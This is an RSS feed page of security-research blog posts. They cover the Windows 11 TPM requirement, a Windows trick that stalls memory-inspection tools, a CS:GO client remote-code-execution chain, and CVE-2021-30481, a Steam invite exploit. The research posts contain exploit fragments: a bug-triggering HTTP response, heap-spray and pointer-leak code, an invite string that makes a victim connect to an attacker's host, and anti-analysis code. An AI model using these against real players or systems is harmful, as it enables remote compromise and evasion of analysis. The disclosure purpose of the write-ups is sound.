RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdaysecret club

Windows 11: TPMs and Digital Sovereignty

28 June 2021 at 00:00

This article is an opinion held by a subset of members about the potential plan from Microsoft about their enforcement of a TPM to use Windows 11 and various features. This article will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with enforcement. If you’re unfamiliar with what a TPM is or its general function we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine, then you ask? Well, the answer is quite simple. It’s not about you; it’s about them.

You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need to only look at highly locked and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple store and Google play store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has laid chiefly dormant because of critical missing infrastructure. This being that until recently, quite a large majority of consumer machines did not have a TPM, which you’ll learn later is a critical component to making Palladium work. And while we won’t deny that Bitlocker is excellent for if your device ever gets stolen, we will remind you that Microsoft always sold this tyranny to look great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state, in particular, to attest to a remote party that your machine is in a non-rooted state. It’s very similar to the Widevine L1 on Android devices; a third-party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4k, but your hardware trust factor is low? Too bad you’ll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can’t risk your pirating tools running in the background!

You might think that “It’s okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it’s not that simple. TPMs have unique keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are then cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose what TPM vendors they want to trust. Sound familiar to you? It’s called Digital Rights Management, otherwise known as DRM.

Let’s not forget, Intel initially shipped the Pentium III with a built-in serial number unique per chip. Much the same initial fate as Palladium, it was also shot down by privacy groups, and the feature was subject to removal.

A common misunderstanding

There seems to be a lot misconceptions floating around in social media. In this section we’ll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, similar to if you root your phone. Remember the part earlier, though, about 4k video content? That won’t be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides what users they trust with their content. Unfortunately, without a TPM, you aren’t cutting it.

You’ve probably noticed that the marketing for this requirement is vague and confusing, and that’s intentional. It doesn’t do much for you, the consumer. However, it does set the stage for the future where Microsoft begins shipping their TPM on your processor. Enter Microsoft’s Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security for the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way to have the PC locked into a nice controllable cube for all the citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you’re done reading it, you forgot how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn’t going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard that have existed for the better part of a decade defend well against such attacks that might seek to overwrite flash memory?

Takeaway

We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. As Microsoft won the secure boot battle a decade ago, which is where Microsoft became the sole owner of the Secure Boot keys, this move also further tightens the screws on the liberties the PC gives us. While it won’t be evident immediately upon the launch of Windows 11, the pieces are moving together at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Preventing memory inspection on Windows

23 May 2021 at 23:00
By: jm

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Conclusion

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Counter-Strike Global Offsets: reliable remote code execution

One of the factors contributing to Counter-Strike Global Offensive’s (herein “CS:GO”) massive popularity is the ability for anyone to host their own community server. These community servers are free to download and install and allow for a high grade of customization. Server administrators can create and utilize custom assets such as maps, allowing for innovative game modes.

However, this design choice opens up a large attack surface. Players can connect to potentially malicious servers, exchanging complex game messages and binary assets such as textures.

We’ve managed to find and exploit two bugs that, when combined, lead to reliable remote code execution on a player’s machine when connecting to our malicious server. The first bug is an information leak that enabled us to break ASLR in the client’s game process. The second bug is an out-of-bounds access of a global array in the .data section of one of the game’s loaded modules, leading to control over the instruction pointer.

Community server list

Players can join community servers using a user friendly server browser built into the game:

Once the player joins a server, their game client and the community server start talking to each other. As security researchers, it was our task to understand the network protocol used by CS:GO and what kind of messages are sent so that we could look for vulnerabilities.

As it turned out, CS:GO uses its own UDP-based protocol to serialize, compress, fragment, and encrypt data sent between clients and a server. We won’t go into detail about the networking code, as it is irrelevant to the bugs we will present.

More importantly, this custom UDP-based protocol carries Protobuf serialized payloads. Protobuf is a technology developed by Google which allows defining messages and provides an API for serializing and deserializing those messages.

Here is an example of a protobuf message defined and used by the CS:GO developers:

message CSVCMsg_VoiceInit {
	optional int32 quality = 1;
	optional string codec = 2;
	optional int32 version = 3 [default = 0];
}

We found this message definition by doing a Google search after having discovered CS:GO utilizes Protobuf. We came across the SteamDatabase GitHub repository containing a list of Protobuf message definitions.

As the name of the message suggests, it’s used to initialize some kind of voice-message transfer of one player to the server. The message body carries some parameters, such as the codec and version used to interpret the voice data.

Developing a CS:GO proxy

Having this list of messages and their definitions enabled us to gain insights into what kind of data is sent between the client and server. However, we still had no idea in which order messages would be sent and what kind of values were expected. For example, we knew that a message exists to initialize a voice message with some codec, but we had no idea which codecs are supported by CS:GO.

For this reason, we developed a proxy for CS:GO that allowed us to view the communication in real-time. The idea was that we could launch the CS:GO game and connect to any server through the proxy and then dump any messages received by the client and sent to the server. For this, we reverse-engineered the networking code to decrypt and unpack the messages.

We also added the ability to modify the values of any message that would be sent/received. Since an attacker ultimately controls any value in a Protobuf serialized message sent between clients and the server, it becomes a possible attack surface. We could find bugs in the code responsible for initializing a connection without reverse-engineering it by mutating interesting fields in messages.

The following GIF shows how messages are being sent by the game and dumped by the proxy in real-time, corresponding to events such as shooting, changing weapons, or moving:

Equipped with this tooling, it was now time for us to discover bugs by flipping some bits in the protobuf messages.

OOB access in CSVCMsg_SplitScreen

We discovered that a field in the CSVCMsg_SplitScreen message, that can be sent by a (malicious) server to a client, can lead to an OOB access which subsequently leads to a controlled virtual function call.

The definition of this message is:

message CSVCMsg_SplitScreen {
	optional .ESplitScreenMessageType type = 1 [default = MSG_SPLITSCREEN_ADDUSER];
	optional int32 slot = 2;
	optional int32 player_index = 3;
}

CSVCMsg_SplitScreen seemed interesting, as a field called player_index is controlled by the server. However, contrary to intuition, the player_index field is not used to access an array, the slot field is. As it turns out, the slot field is used as an index for the array of splitscreen player objects located in the .data segment of engine.dll file without any bounds checks.

Looking at the crash we could already observe some interesting facts:

  1. The array is stored in the .data section within engine.dll
  2. After accessing the array, an indirect function call on the accessed object occurs

The following screenshot of decompiled code shows how player_splot was used without any checks as an index. If the first byte of the object was not 1, a branch is entered:

The bug proved to be quite promising, as a few instructions into the branch a vtable is dereferenced and a function pointer is called. This is shown in the next screenshot:

We were very excited about the bug as it seemed highly exploitable, given an info leak. Since the pointer to an object is obtained from a global array within engine.dll, which at the time of writing is a 6MB binary, we were confident that we could find a pointer to data we control. Pointing the aforementioned object to attacker controlled data would yield arbitrary code execution.

However, we would still have to fake a vtable at a known location and then point the function pointer to something useful. Due to this constraint, we decided to look for another bug that could lead to an info leak.

Uninitialized memory in HTTP downloads leads to information disclosure

As mentioned earlier, server admins can create servers with any number of customizations, including custom maps and sounds. Whenever a player joins a server with such customizations, files behind the customizations need to be transferred. Server admins can create a list of files that need to be downloaded for each map in the server’s playlist.

During the connection phase, the server sends the client the URL of a HTTP server where necessary files should be downloaded from. For each custom file, a cURL request would be created. Two options that were set for each request piqued our interested: CURLOPT_HEADERFUNCTION and CURLOPT_WRITEFUNCTION. The former allows a callback to be registered that is called for each HTTP header in the HTTP response. The latter allows registering a callback that is triggered whenever body data is received.

The following screenshot shows how these options are set:

We were interested in seeing how Valve developers handled incoming HTTP headers and reverse engineered the function we named CurlHeaderCallback().

It turned out that the CurlHeaderCallback() simply parsed the Content-Length HTTP header and allocated an uninitialized buffer on the heap accordingly, as the Content-Length should correspond to the size of the file that should be downloaded.

The CurlWriteCallback() would then simply write received data to this buffer.

Finally, once the HTTP request finished and no more data was to be received, the buffer would be written to disk.

We immediately noticed a flaw in the parsing of the HTTP header Content-Length: As the following screenshot shows, a case sensitive compare was made.

Case sensitive search for the Content-Length header.

This compare is flawed as HTTP headers can be lowercase as well. This is only the case for Linux clients as they use cURL and then do the compare. On Windows the client just assumes that the value returned by the Windows API is correct. This yields the same bug, as we can just send an arbitrary Content-Length header with a small response body.

We set up a HTTP server with a Python script and played around with some HTTP header values. Finally, we came up with a HTTP response that triggers the bug:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1337
content-length: 0
Connection: closed

When a client receives such a HTTP response for a file download, it would recognize the first Content-Length header and allocate a buffer of size 1337. However, a second content-length header with size 0 follows. Although the CS:GO code misses the second Content-Length header due to its case sensitive search and still expects 1337 bytes of body data, cURL uses the last header and finishes the request immediately.

On Windows, the API just returns the first header value even though the response is ill-formed. The CS:GO code then writes the allocated buffer to disk, along with all uninitialized memory contents, including pointers, contained within the buffer.

Although it appears that CS:GO uses the Windows API to handle the HTTP downloads on Windows, the exact same HTTP response worked and allowed us to create files of arbitrary size containing uninitialized memory contents on a player’s machine.

A server can then request these files through the CNETMsg_File message. When a client receives this message, they will upload the requested file to the server. It is defined as follows:

message CNETMsg_File {
	optional int32 transfer_id = 1;
	optional string file_name = 2;
	optional bool is_replay_demo_file = 3;
	optional bool deny = 4;
}

Once the file is uploaded, an attacker controlled server could search the file’s contents to find pointers into engine.dll or heap pointers to break ASLR. We described this step in detail in our appendix section Breaking ASLR.

Putting it all together: ConVars as a gadget

To further enable customization of the game, the server and client exchange ConVars, which are essentially configuration options.

Each ConVar is managed by a global object, stored in engine.dll. The following code snippet shows a simplified definition of such an object which is used to explain why ConVars turned out to be a powerful gadget to help exploit the OOB access:

struct ConVar {
    char *convar_name;
    int data_len;
    void *convar_data;
    int color_value;
};

A community server can update its ConVar values during a match and notify the client by sending the CNETMsg_SetConVar message:

message CMsg_CVars {
	message CVar {
		optional string name = 1;
		optional string value = 2;
		optional uint32 dictionary_name = 3;
	}

	repeated .CMsg_CVars.CVar cvars = 1;
}

message CNETMsg_SetConVar {
	optional .CMsg_CVars convars = 1;
}

These messages consist of a simple key/value structure. When comparing the message definition to the struct ConVar definition, it is correct to assume that the entirely attacker-controllable value field of the ConVar message is copied to the client’s heap and a pointer to it is stored in the convar_value field of a ConVar object.

As we previously discussed, the OOB access in CSVCMsg_SplitScreen occurs in an array of pointers to objects. Here is the decompilation of the code in which the OOB access occurs as a reminder:

Since the array and all ConVars are located in the .data section of engine.dll, we can reliably set the player_slot argument such that the ptr_to_object points to a ConVar value which we previously set. This can be illustrated as follows:

We also mentioned earlier that a few instructions after the OOB access a virtual method on the object is called. This happens as usual through a vtable dereference. Here is the code again as a reminder:

Since we control the contents of the object through the ConVar, we can simply set the vtable pointer to any value. In order to make the exploit 100% reliable, it would make sense to use the info leak to point back into the .data section of engine.dll into controlled data.

Luckily, some ConVars are interpreted as color values and expect a 4 byte (Red Blue Green Alpha) value, which can be attacker controlled. This value is stored directly in the color_value field in above struct ConVar definition. Since the CS:GO process on Windows is 32-bit, we were able to use the color value of a ConVar to fake a pointer.

If we use the fake object’s vtable pointer to point into the .data section of engine.dll, such that the called method overlaps with the color_value, we can finally hijack the EIP register and redirect control flow arbitrarily. This chain of dereferences can be illustrated as follows:

ROP chain to RCE

With ASLR broken and us having gained arbitrary instruction pointer control, all that was left to do was build a ROP chain that finally lead to us calling ShellExecuteA to execute arbitrary system commands.

Conclusion

We submitted both bugs in one report to Valve’s HackerOne program, along with the exploit we developed that proved 100% reliablity. Unfortunately, in over 4 months, we did not even receive an acknowledgment by a Valve representative. After public pressure, when it became apparent that Valve had also ignored other Security Researchers with similar impact, Valve finally fixed numerous security issues. We hope that Valve re-structures its Bug Bounty program to attract Security Researchers again.

Time Table

Date (DD/MM/YYYY) What
04.01.2021 Reported both bugs in one report to Valve’s bug bounty program
11.01.2021 A HackerOne triager verifies the bug and triages it
10.02.2021 First follow-up, no response from Valve
23.02.2021 Second follow-Up, no response from Valve
10.04.2021 Disclosure of Bug existance via twitter
15.04.2021 Third follow-up, no response from Valve
28.04.2021 Valve patches both bugs

Breaking ASLR

In the Uninitialized memory in HTTP downloads leads to information disclosure section, we showed how the HTTP download allowed us to view arbitrarily sized chunks of uninitialized memory in a client’s game process.

We discovered another message that seemed quite interesting to us: CSVCMsg_SendTable. Whenever a client received such a message, it would allocate an object with attacker-controlled integer on the heap. Most importantly, the first 4 bytes of the object would contain a vtable pointer into engine.dll.

def spray_send_table(s, addr, nprops):
    table = nmsg.CSVCMsg_SendTable()
    table.is_end = False
    table.net_table_name = "abctable"
    table.needs_decoder = False

    for _ in range(nprops):
        prop = table.props.add()
        prop.type = 0x1337ee00
        prop.var_name = "abc"
        prop.flags = 0
        prop.priority = 0
        prop.dt_name = "whatever"
        prop.num_elements = 0
        prop.low_value = 0.0
        prop.high_value = 0.0
        prop.num_bits = 0x00ff00ff

    tosend = prepare_payload(table, 9)
    s.sendto(tosend, addr)

The Windows heap is kind of nondeteministic. That is, a malloc -> free -> malloc combo will not yield the same block. Thankfully, Saar Amaar published his great research about the Windows heap, which we consulted to get a better understanding about our exploit context.

We came up with a spray to allocate many arrays of SendTable objects with markers to scan for when we uploaded the files back to the server. Because we can choose the size of the array, we chose a not so commonly alloacted size to avoid interference with normal game code. If we now deallocate all of the sprayed arrays at once and then let the client download the files the chance of one of the files to hit a previously sprayed chunk is relativly high.

In practice, we almost always got the leak in the first file and when we didn’t we could simply reset the connection and try again, as we have not corrupted the program state yet. In order to maximize success, we created four files for the exploit. This ensures that at least one of them succeeds and otherwise simply try again.

The following code shows how we scanned the received memory for our sprayed object to find the SendTable vtable which will point into engine.dll.

files_received.append(fn)
pp = packetparser.PacketParser(leak_callback)

for i in range(len(data) - 0x54):
    vtable_ptr = struct.unpack('<I', data[i:i+4])[0]
    table_type = struct.unpack('<I', data[i+8:i+12])[0]
    table_nbits = struct.unpack('<I', data[i+12:i+16])[0]
    if table_type == 0x1337ee00 and table_nbits == 0x00ff00ff:
        engine_base = vtable_ptr - OFFSET_VTABLE 
        print(f"vtable_ptr={hex(vtable_ptr)}")
        break

CVE-2021-30481: Source engine remote code execution via game invites

20 April 2021 at 00:00
By: floesen

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations. You can arbitrarily execute any game command of your choice. Here, you can now give free rein to your creativity; everything you can configure in the UI and much more beyond that can generally be tweaked with using console commands. This allows for funny things as messing with people’s game language, their sensitivity, resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers in the same manner as you would typically do it to configure something in your game client. This works by prefixing any console command with rcon before executing it. In order to do so, this requires you to previously connect and authenticate yourself to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victims accept the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate to the server. All of this is already very concerning as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client-side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. The following image 1 shows how RCON packets look like in general. The content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.

Now, starting with the first type, it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave it out. Below, there is an example of something that would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is then subsequently unpacked to the root CS:GO installation folder. Unfortunately, we cannot control the name under which the screenshot is saved on the disk nor can we control the file extension. The screenshot is always saved as screenshotXXXX.jpg where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
{
	char pScreenshotPath[MAX_PATH];
	do 
	{
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
	{
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	}
	CloseZip( hZip );
}

Note that an attacker can send these kinds of RCON packets without the client requesting anything prior. Already, an attacker can upload arbitrary files if the victim accepts the game invite. So far, there is no memory corruption required yet.

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
{
	// ...
	s=(unz_s*)file;
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
		err=UNZ_ERRNO;
	// ...
}

In the code above, the relative offset of the local file header located in the central directory file header is read into file_info_internal.offset_curfile. This allows to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Somewhere later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is now processed given the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
{
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;


	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
			err=UNZ_ERRNO;
	// ...
}

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive (here, it can be assumed that there are no additional bytes in front of the archive).

From this assumption it follows that s->byte_before_the_zipfile is 0.

This is very similar to how dealing with files works in the C standard library. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
{
	// ...
	else
	{ 
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;
	}
}

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
{
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;
}

int unzlocal_getByte(LUFILE *fin,int *pi)
{
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...
}

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
{
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;
}

Given the fact that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte that is just a single byte in size, this immediately corrupts the stack.

unzlocal_getByte calls lufread(&c, 1, 1, fin) with c being an unsigned char.

Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.

